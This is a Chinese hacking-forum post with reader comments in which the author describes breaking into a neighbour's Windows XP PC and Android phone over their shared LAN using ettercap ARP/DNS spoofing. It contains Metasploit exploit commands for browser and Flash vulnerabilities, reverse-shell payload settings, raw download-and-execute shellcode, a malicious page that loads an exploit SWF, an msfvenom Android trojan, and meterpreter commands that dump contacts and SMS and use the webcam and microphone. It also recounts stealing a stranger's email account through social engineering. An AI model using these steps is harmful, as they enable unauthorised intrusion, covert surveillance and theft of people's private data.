内网渗透大杂烩
闲来无事,就想着写一篇内网渗透大杂烩的文章,之前用莲花仙子账号写的两篇内网渗透文章分别为渗透测试某大型局域网、渗透测试某大型局域网网关防火墙,现如今号都被删了,哎!之前那个账号10rank,多么可惜啊!好了我们长话短说步入正题!
第一篇 利用CVE-2014-6332 IE全版本漏洞入侵邻居XP电脑
首先开篇的是入侵邻居的电脑,邻居是个电脑盲,我所了解的情况是2011年买了电脑,几乎不怎么用,而且也不安装杀毒,估计补丁都不会打吧,就星期天用一下,正好今天周末,于是乎就开始下面的渗透过程。首先net view(这里就不用nmap扫了)如图:
Zhongce那台是我的,我们ping一下ping BBLBX6GQE624W88如图:
USER-20150620EZ这个就不用Ping了是我的物理主机名,OK,既然没打补丁,那就不用nessus扫描了,直接测试CVE-2014-6332 IE全版本漏洞了,我们需要搭建一个web环境这里我用小旋风,先配置一个远控木马如图:
192.168.0.104是我的物理ip,然后选择域名上线方式,生成木马丢到web跟木下,下面我们用k8飞刀工具来生成一个网马,点编码然后输入木马地址:http://192.168.0.104:89/server.exe
然后点右键hacking-0day-ie全版本漏洞,生成网马如图:
然后我们把网名名称改为:index.htm然后丢到kai linux /var/www/html/下面
我们的思路是通过ettercap来dns+arp攻击的方法来使xp种木马,对了记得执行service apache2 start命令启动kali web服务,下面我们来设置一下etteracap的etter.dns如图:
192.168.0.113为kali的ip地址,然后ettercap -G启动图形化界面,点
然后选择eth0
然后选择hostlist,如图:
前面我们已经Ping过了xp系统ip为192.168.0.116,那么我们就把这个目标加到Target1,然后把网关地址加到Target2,然后在按照如图操作:
然后选择Plugins,选择
双击以后,然后开始
大概过了半分钟发现有主机上线,哈哈欺骗成功了
我们打开屏幕看看
他肯定是看视屏然后发现看不了了就打开hao123测试网络,哈哈我们不要搞什么破坏卸载掉木马。。。这样渗透测试邻居XP的渗透过程就完结了。。。
第二篇 flash 0day之手工修改代码利用msf制作下载者实例入侵演示
利用到的工具:
Msf
Ettercap
Adobe Flash CS6
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
如图:
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
然后执行generate -t dword生成shellcode,如下:
复制代码到文本下便于我们一会编辑flash exp,如下:下面我们来修改flash 0day exp,需要修改三个文件,分别为:
先修改ShellWin32.as,部分源代码如图:
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
然后点保存,下面我们来编译一下,打开
exp1.fla然后点文件-发布,看看编译没错误
然后我们把生成的
exp1.swf丢到kailinux 的/var/www/html下:
然后把这段代码好好编辑一下注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
下面我们用ettercap欺骗如图:
下面我们随便访问个网站看看:
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,木马上线如图:
我们看另一台
提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。不管他了,第二篇over。。。
第三篇 cve2015-5122漏洞实例演示虚拟机
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
search cve-2015-5122如图:
下面我们敲如下命令:
use exploit/multi/browser/adobe_flash_opaque_background_uaf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.109
set URIPATH / /*根目录*/
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
然后show options如图:
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
成功了,这时候我们断开ettercap,如图:
Screenshot如图:
第四篇 MS14-064 漏洞测试入侵win7
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
set AllowPowershellPrompt true
Set LHOST 192.168.0.109
set SRVHOST 192.168.0.109
Set uripath share
Set srvport 80
show options
下面我们来访问本地地址成功如图:
第五篇 msf+ettercap入侵邻居安卓手机
首先启动msf
先用kali生成一个安卓木马,如下命令:
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
然后进入msf
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.109 //ip为kaili的ip
set LPORT 44444 //端口一定要与前面生成的木马的端口一致
Exploit
下面我们开启ettercap -G
我物理IP为
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
下面我们来设置一下
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了
我们试着访问一下看看,别出什么错,访问正常。。
下面我们开始攻击
大概过了5分钟多,发现反弹成功了,哈哈老大叔还不错一看日本AV哈哈估计上劲就安装了。。。
执行命令
dump_contacts --》这个是导出电话
dump_sms --》这个是导出信息
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
生成电话薄txt
我们打开看一下电话薄
打开短信看一下
我们同时欺骗成DroidJack木马,使用方法如图:
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口否则上线不了
文件管理如图:
短信管理如图:
查看安装app如图:
查看浏览过的网页如图:
文章所需的工具及word格式打包:
链接: http://pan.baidu.com/s/1o8LB2Lc 密码: wy4p
自评TCV:3
总结:抽时间搞了2天,在搞得同时觉得还是蛮享受的,加入吐司,咋闲余时间分享一些学习经验也是一件何乐而不为的事情啊,虽然自己的水平有限,但是还是十分愿意分享一些东西,希望在吐司与大家共同进步、共同学习,也祝大家在2016年,工作顺利,家庭幸福美满,也祝各位小伙伴技术能有更高的提高,谢谢观看!作者:googler
补充:看到各位老表的回复有话要说
哈哈,我邻居中途有跑过来问我怎么断网了,我说可能路由器死了,等会就好,哈哈没办法有时候渗透就是这样,也许存在攻击者与被攻击者水平高低的问题,也可能也就是他么的好奇害死猫,我记得之前做社工,我的名字邮箱,163的,我之前踩点发现绑定在一个QQ邮箱上,而且没有设置安全码,后来我就在那个人的博客上查找资料,然后查找到以后发现他是某北人在北京打工,然后我就用女小号加他和他聊了2-3天,我说我是北京科技大学的,然后我说我有时间去看你,那小伙子整天起来玩梦幻,正好我也玩梦幻,就和他聊的很熟,后来我说我能不能借用一下你的QQ号,假装看他有没有和别的女生来往(故作在乎他,假装要和他好),他说他百分之百没有女朋友不信把QQ账号密码丢我,结果我在一个夜高风黑的晚上,把网易邮箱给搞成我的,然后还设置了安全码,然后拉黑他!至此一个社工就结束了!哈哈,这个案例,我只能说,攻击有时候是在各种巧合,各种真真假假、各种峰回路转的时候成功的,再比如那些做苹果ID的发邮箱,标题写务必查看,一点就中XSS了,作为搞安全的我,明知道这样有风险,但是我看那个标题,忍不住还是想点一下,这一点就不中招了么。。
好了,说这么多就是想告知大家,做渗透的时候,只要有一线希望就要百倍努力,大家了解过国家队的人,应该深有体会,hack,没有什么不可能,只有离成功更近,只要你努力的话。。。。OK,装逼就到此了
第一篇 利用CVE-2014-6332 IE全版本漏洞入侵邻居XP电脑
首先开篇的是入侵邻居的电脑,邻居是个电脑盲,我所了解的情况是2011年买了电脑,几乎不怎么用,而且也不安装杀毒,估计补丁都不会打吧,就星期天用一下,正好今天周末,于是乎就开始下面的渗透过程。首先net view(这里就不用nmap扫了)如图:
Zhongce那台是我的,我们ping一下ping BBLBX6GQE624W88如图:
USER-20150620EZ这个就不用Ping了是我的物理主机名,OK,既然没打补丁,那就不用nessus扫描了,直接测试CVE-2014-6332 IE全版本漏洞了,我们需要搭建一个web环境这里我用小旋风,先配置一个远控木马如图:
192.168.0.104是我的物理ip,然后选择域名上线方式,生成木马丢到web跟木下,下面我们用k8飞刀工具来生成一个网马,点编码然后输入木马地址:http://192.168.0.104:89/server.exe
然后点右键hacking-0day-ie全版本漏洞,生成网马如图:
然后我们把网名名称改为:index.htm然后丢到kai linux /var/www/html/下面
我们的思路是通过ettercap来dns+arp攻击的方法来使xp种木马,对了记得执行service apache2 start命令启动kali web服务,下面我们来设置一下etteracap的etter.dns如图:
192.168.0.113为kali的ip地址,然后ettercap -G启动图形化界面,点
然后选择eth0
然后选择hostlist,如图:
前面我们已经Ping过了xp系统ip为192.168.0.116,那么我们就把这个目标加到Target1,然后把网关地址加到Target2,然后在按照如图操作:
然后选择Plugins,选择
双击以后,然后开始
大概过了半分钟发现有主机上线,哈哈欺骗成功了
我们打开屏幕看看
他肯定是看视屏然后发现看不了了就打开hao123测试网络,哈哈我们不要搞什么破坏卸载掉木马。。。这样渗透测试邻居XP的渗透过程就完结了。。。
第二篇 flash 0day之手工修改代码利用msf制作下载者实例入侵演示
利用到的工具:
Msf
Ettercap
Adobe Flash CS6
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
如图:
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
然后执行generate -t dword生成shellcode,如下:
复制代码到文本下便于我们一会编辑flash exp,如下:
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
先修改ShellWin32.as,部分源代码如图:
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
然后点保存,下面我们来编译一下,打开
exp1.fla然后点文件-发布,看看编译没错误
然后我们把生成的
exp1.swf丢到kailinux 的/var/www/html下:
然后把这段代码好好编辑一下
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=utf-8"/>
</head>
<body>
<h2> Please wait, the requested page is loading...</h2>
<br>
<OBJECT
classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><PARAM NAME=movie
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
</body>
<script>
setTimeout(function () {
window.location.reload();
}, 10000);
</script>
</html>
下面我们用ettercap欺骗如图:
下面我们随便访问个网站看看:
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,木马上线如图:
我们看另一台
提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。不管他了,第二篇over。。。
第三篇 cve2015-5122漏洞实例演示虚拟机
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
search cve-2015-5122如图:
下面我们敲如下命令:
use exploit/multi/browser/adobe_flash_opaque_background_uaf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.109
set URIPATH / /*根目录*/
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
然后show options如图:
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
成功了,这时候我们断开ettercap,如图:
Screenshot如图:
第四篇 MS14-064 漏洞测试入侵win7
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
set AllowPowershellPrompt true
Set LHOST 192.168.0.109
set SRVHOST 192.168.0.109
Set uripath share
Set srvport 80
show options
下面我们来访问本地地址成功如图:
第五篇 msf+ettercap入侵邻居安卓手机
首先启动msf
先用kali生成一个安卓木马,如下命令:
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
然后进入msf
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.109 //ip为kaili的ip
set LPORT 44444 //端口一定要与前面生成的木马的端口一致
Exploit
下面我们开启ettercap -G
我物理IP为
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
下面我们来设置一下
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了
我们试着访问一下看看,别出什么错,访问正常。。
下面我们开始攻击
大概过了5分钟多,发现反弹成功了,哈哈老大叔还不错一看日本AV哈哈估计上劲就安装了。。。
执行命令
dump_contacts --》这个是导出电话
dump_sms --》这个是导出信息
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
生成电话薄txt
我们打开看一下电话薄
打开短信看一下
我们同时欺骗成DroidJack木马,使用方法如图:
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口否则上线不了
文件管理如图:
短信管理如图:
查看安装app如图:
查看浏览过的网页如图:
文章所需的工具及word格式打包:
链接: http://pan.baidu.com/s/1o8LB2Lc 密码: wy4p
自评TCV:3
总结:抽时间搞了2天,在搞得同时觉得还是蛮享受的,加入吐司,咋闲余时间分享一些学习经验也是一件何乐而不为的事情啊,虽然自己的水平有限,但是还是十分愿意分享一些东西,希望在吐司与大家共同进步、共同学习,也祝大家在2016年,工作顺利,家庭幸福美满,也祝各位小伙伴技术能有更高的提高,谢谢观看!作者:googler
补充:看到各位老表的回复有话要说
哈哈,我邻居中途有跑过来问我怎么断网了,我说可能路由器死了,等会就好,哈哈没办法有时候渗透就是这样,也许存在攻击者与被攻击者水平高低的问题,也可能也就是他么的好奇害死猫,我记得之前做社工,我的名字邮箱,163的,我之前踩点发现绑定在一个QQ邮箱上,而且没有设置安全码,后来我就在那个人的博客上查找资料,然后查找到以后发现他是某北人在北京打工,然后我就用女小号加他和他聊了2-3天,我说我是北京科技大学的,然后我说我有时间去看你,那小伙子整天起来玩梦幻,正好我也玩梦幻,就和他聊的很熟,后来我说我能不能借用一下你的QQ号,假装看他有没有和别的女生来往(故作在乎他,假装要和他好),他说他百分之百没有女朋友不信把QQ账号密码丢我,结果我在一个夜高风黑的晚上,把网易邮箱给搞成我的,然后还设置了安全码,然后拉黑他!至此一个社工就结束了!哈哈,这个案例,我只能说,攻击有时候是在各种巧合,各种真真假假、各种峰回路转的时候成功的,再比如那些做苹果ID的发邮箱,标题写务必查看,一点就中XSS了,作为搞安全的我,明知道这样有风险,但是我看那个标题,忍不住还是想点一下,这一点就不中招了么。。
好了,说这么多就是想告知大家,做渗透的时候,只要有一线希望就要百倍努力,大家了解过国家队的人,应该深有体会,hack,没有什么不可能,只有离成功更近,只要你努力的话。。。。OK,装逼就到此了
评论60次
很不错的文章啊,特别是安卓手机攻击那
我记得你上次 公布的教程 就有这个 貌似 或者是我记错了.. 支持个.
感觉还可以深入啊 ,为啥你邻居呢在你家wifi上啊。。。
内网渗透 msf
全端免杀? 都不报警么? 好吧没仔细看 基本不装杀毒软件
googler 能否把 win下的几个工具共享出来,
好啊等我打包了上传上去
googler 能否把 win下的几个工具共享出来,
还是很棒的,不过有时候做内网入侵碰到对面开防火墙基本就可以放弃了。
目测蹭网。 我家周围能破的我都破了
前用莲花仙子账号写的两篇内网渗透文章分别为渗透测试某大型局域网、渗透测试某大型局域网网关防火墙,现如今号都被删了,哎!之前那个账号10rank,多么可惜啊!好了我们长话短说步入正题!重点在“10rank”转载请注明出处
哈哈,好可惜的
我去,王子表哥的内网好6啊!!真是相当不错的科普文!!!我也要比着葫芦画瓢去了!
哈哈多谢老表点评
前用莲花仙子账号写的两篇内网渗透文章分别为渗透测试某大型局域网、渗透测试某大型局域网网关防火墙,现如今号都被删了,哎!之前那个账号10rank,多么可惜啊!好了我们长话短说步入正题! 重点在“10rank” 转载请注明出处
很详细,谢谢
感觉,自己搞自己。。。不过还是不错的。
为什么你和你邻居在一个段?
目测蹭网进去的,不然就是合租,
为什么你和你邻居在一个段?
因为我家的房子是三层房子,收了好多邻居哦
很猥琐跟黑阔做邻居很危险。同问为何跟邻居在一个网络。当然了站在技术角度来讲 不用在意这些细节看的是思路。powershell下的渗透脚本可以给坛友们多贴一些实战利用的。这些都需要时间整理,撸主幸苦了
绝对的科普文,非常适合初学者
我去,王子表哥的内网好6啊!!真是相当不错的科普文!!!我也要比着葫芦画瓢去了!
为什么你和你邻居在一个段?